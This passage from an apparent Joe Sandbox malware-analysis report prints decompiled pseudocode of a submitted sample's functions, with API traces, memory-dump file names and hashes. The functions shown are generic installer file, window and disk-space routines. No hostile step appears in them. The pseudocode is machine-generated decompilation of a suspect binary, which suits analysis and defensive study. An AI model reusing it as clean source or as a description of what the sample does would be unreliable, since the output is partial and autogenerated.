								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x732d504c =  *0x732d504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x732d5058;
					if( *0x732d5058 == 0) {
						 *0x732d504c = 0;
					}
					E732D2B42(_t107, _a4,  *0x732d5034,  *0x732d5038);
					return _a4;
				}
				_push(E732D2B14() + _a4);
				_t56 = E732D2B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E732D2B26();
				_t87 = E732D2B22();
				_t90 = E732D2B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x732d2ba8
0x732d2bb9
0x732d2bc6
0x732d2bda
0x732d2bc8
0x732d2bcd
0x732d2bd2
0x732d2bd2
0x732d2bc6
0x732d2be3
0x732d2be8
0x732d2bee
0x732d2c32
0x732d2c32
0x732d2c37
0x732d2c3c
0x732d2c42
0x732d2c44
0x732d2c4a
0x732d2c57
0x732d2c59
0x732d2c5e
0x732d2c6b
0x732d2c7e
0x732d2c84
0x732d2c8a
0x732d2c8b
0x732d2c91
0x732d2c9d
0x732d2ca3
0x732d2cab
0x732d2cac
0x732d2caf
0x732d2cba
0x732d2cbc
0x732d2cc8
0x732d2cce
0x732d2cd6
0x732d2d02
0x732d2d03
0x732d2d05
0x732d2d09
0x732d2d09
0x732d2d10
0x732d2ce6
0x732d2ce6
0x732d2ce7
0x732d2cf5
0x732d2cfe
0x732d2cfe
0x732d2cd6
0x732d2cba
0x732d2d12
0x732d2d19
0x732d2d1b
0x732d2d1b
0x732d2d34
0x732d2d42
0x732d2d42
0x732d2bf9
0x732d2bfa
0x732d2bff
0x732d2c03
0x732d2c08
0x732d2c1c
0x732d2c1d
0x732d2c1e
0x732d2c20
0x732d2c25
0x732d2c27
0x732d2c27
0x732d2c2a
0x732d2c30
0x00000000

APIs

ReadFile.KERNELBASE(00000000), ref: 732D2C57

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 8556496b55315d6a70f86a0124d8a4ac0e21d36ca608597d797b6b17bcad5469
Instruction ID: f8fee7b55205c6d62d25447f47579b98b6e8b9ec56aee07d3e17eb3bf5968110
Opcode Fuzzy Hash: 8556496b55315d6a70f86a0124d8a4ac0e21d36ca608597d797b6b17bcad5469
Instruction Fuzzy Hash: 0341AEB293430DDFEB12EF65E988B497779EB48316F30C426E409C6144D7F998D0AB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040608D Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040608D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00406091
0x004060a1
0x004060a9
0x00000000
0x004060b0
0x00000000
0x004060b2

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BF,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060A1

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5

Uniqueness

Uniqueness Score: -1.00%

Function 004060BC Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BC(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060c0
0x004060d0
0x004060d8
0x00000000
0x004060df
0x00000000
0x004060e1

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403475,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060D0

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4

Uniqueness

Uniqueness Score: -1.00%

Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044C2(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7a7a38;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044c2
0x004044c9
0x004044d4
0x00000000
0x004044d4
0x004044da

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C

Uniqueness

Uniqueness Score: -1.00%

Function 004034C2 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034C2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034d0
0x004034d6

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044AB Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044AB(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x7a8a68, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044b9
0x004044bf

APIs

SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404498(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7a1f44, _a4); // executed
				return _t2;
			}

0x004044a2
0x004044a8

APIs

KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
Instruction ID: 3b5dc4dfeaf44569f9deb2ecf0de9c371932af0cf72a0f4646a25a2108455337
Opcode Fuzzy Hash: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
Instruction Fuzzy Hash: E0D05E73A141018BD704EBB8BE8545E73A8EB503193208C37D402E1091EA7888564618

Uniqueness

Uniqueness Score: -1.00%

Function 732D12BB Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E732D12BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x732d506c +  *0x732d506c); // executed
				return _t3;
			}

0x732d12c5
0x732d12cb

APIs

GlobalAlloc.KERNELBASE(00000040,?,732D12DB,?,732D137F,00000019,732D11CA,-000000A0), ref: 732D12C5

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: c8d594a65c58ce9610afa1877a53426dab581a217eedfecdbc21883f9fa63a83
Instruction ID: c0315237ac46f11e2d056d425b69564bf6039ae46e97ccdc33f3e324f7399fb4
Opcode Fuzzy Hash: c8d594a65c58ce9610afa1877a53426dab581a217eedfecdbc21883f9fa63a83
Instruction Fuzzy Hash: 1BB012B2E10010DFEF00BB65DC4EF343294E704303F24C040FA08C0180C66048209934

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404967 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404967(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f20; // 0xa1e104
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B5E(0x3fb, _t146);
					E004067A1(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B5E(0x3fb, _t146);
							if(E00405EF1(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040651A(0x79ff18, _t146);
							_t87 = E004068E7(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040651A(0x79ff18, _t146);
								_t89 = E00405E94(0x79ff18);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff18,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff18) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff18,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E35(0x79ff18);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff18) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E04(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != _t158) {
									E00404DEC(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff08);
									} else {
										E00404D23(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b04 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404498(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f38 == _t158) {
									E004048C0();
								}
								 *0x7a1f38 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f48;
							_v60 = E00404CBD;
							_v56 = _t146;
							_v68 = E00406557(_t146, 0x7a1f48, _t167, 0x7a0720, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DE9(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8a70 + 0x11c));
								if( *((intOrPtr*)( *0x7a8a70 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00406557(_t146, 0x7a1f48, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a00, 0x7a1f48) != 0) {
										lstrcatW(_t146, 0x7a6a00);
									}
								}
								 *0x7a1f38 =  *0x7a1f38 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E60(_t146) != 0 && E00405E94(_t146) == 0) {
						E00405DE9(_t146);
					}
					 *0x7a7a38 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404476(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404476(_t167);
					E004044AB(_t166);
					_t138 = E004068E7(8);
					if(_t138 == 0) {
						L53:
						return E004044DD(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404967
0x0040496d
0x00404973
0x00404980
0x0040498e
0x00404991
0x00404999
0x0040499f
0x0040499f
0x004049ab
0x004049ae
0x00404a1c
0x00404a23
0x00404afa
0x00404b01
0x00404b10
0x00404b10
0x00404b14
0x00404b1e
0x00404b2b
